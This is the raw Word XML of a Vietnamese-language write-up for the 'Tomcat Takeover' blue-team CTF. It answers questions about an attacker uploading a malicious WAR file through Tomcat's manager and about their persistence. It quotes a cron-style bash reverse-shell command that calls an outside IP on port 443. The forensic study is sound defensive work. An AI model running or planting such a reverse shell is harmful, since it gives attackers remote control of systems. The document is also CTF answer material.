          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Q7. Khi đã ở trong bảng quản trị, kẻ tấn công đã cố gắng tải lên một tệp với mục đích thiết lập một</w:t>
      </w:r>
      <w:r w:rsidR="00F22620">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tên</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> của tệp độc hại này từ dữ liệu đã thu được </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:r w:rsidR="00510699">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /manager/html/upload: ZXQOZY.war.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42339174" w14:textId="34342903" w:rsidR="00030621" w:rsidRPr="00030621" w:rsidRDefault="00510699">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00510699">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50161648" wp14:editId="677364D7">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005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F89868" w14:textId="4186E6EC" w:rsidR="00030621" w:rsidRPr="00030621" w:rsidRDefault="00030621" w:rsidP="00030621">
      <w:pPr>
        <w:pStyle w:val="qst-text"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Q8. Sau khi thiết lập thành công một </w:t>
      </w:r>
      <w:r w:rsidR="009215D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tệp độc hại ZXQOZY</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009215D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">để </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên máy chủ, kẻ tấn công nhằm mục đích đảm bảo tính bền vững trên máy bị xâm nhập. </w:t>
      </w:r>
      <w:r w:rsidR="00D9411B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tệp độc hại bắt đầu gửi SYN để trả về kết quả lệnh cho kẻ tấn công. </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Từ phân tích, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ệnh cụ thể</w:t>
      </w:r>
      <w:r w:rsidR="00510699">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00030621">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>được lên lịch chạy để duy trì sự hiện diện của chúng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> là</w:t>
      </w:r>
      <w:r w:rsidR="00DB7AF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB7AF6" w:rsidRPr="00DB7AF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/14.0.0.120/443 0&gt;&amp;1'</w:t>
      </w:r>
      <w:r w:rsidR="00DB7AF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B8D4E2" w14:textId="6AAAAAA5" w:rsidR="00030621" w:rsidRDefault="0083118A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083118A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30616A21" wp14:editId="60C13DCF">
            <wp:extent cx="5943600" cy="334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2005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10507904" w14:textId="77777777" w:rsidR="00030621" w:rsidRPr="00030621" w:rsidRDefault="00030621">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00030621" w:rsidRPr="000306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621"/>
    <w:rsid w:val="00030621"/>
    <w:rsid w:val="00465490"/>
    <w:rsid w:val="00510699"/>
    <w:rsid w:val="00584938"/>
    <w:rsid w:val="006103FF"/>
    <w:rsid w:val="00611D42"/>
    <w:rsid w:val="006D0D08"/>
    <w:rsid w:val="0075005D"/>
    <w:rsid w:val="00817903"/>
    <w:rsid w:val="0083118A"/>
    <w:rsid w:val="009215D3"/>
    <w:rsid w:val="00A32928"/>
    <w:rsid w:val="00C03900"/>
    <w:rsid w:val="00D9411B"/>
    <w:rsid w:val="00DB7AF6"/>
    <w:rsid w:val="00EE056E"/>
    <w:rsid w:val="00F22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09BA7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB5E2CC9-8272-44A1-AA67-54902AA7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0621"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00030621"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="qst-text">
    <w:name w:val="qst-text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000306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632616">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="786394191">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="838929417">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="463083396">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1075013703">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1655641445">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1077631731">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1752972080">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1080254721">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="737023426">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1298533323">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="916328284">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1768496678">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="58329078">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2053114995">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="455025439">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2056931581">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1818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cyberdefenders.org/blueteam-ctf-challenges/tomcat-takeover/"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315</Words>
  <Characters>1799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Nhật Quang Nguyễn</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nhật Quang NL</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-18T02:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-28T16:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>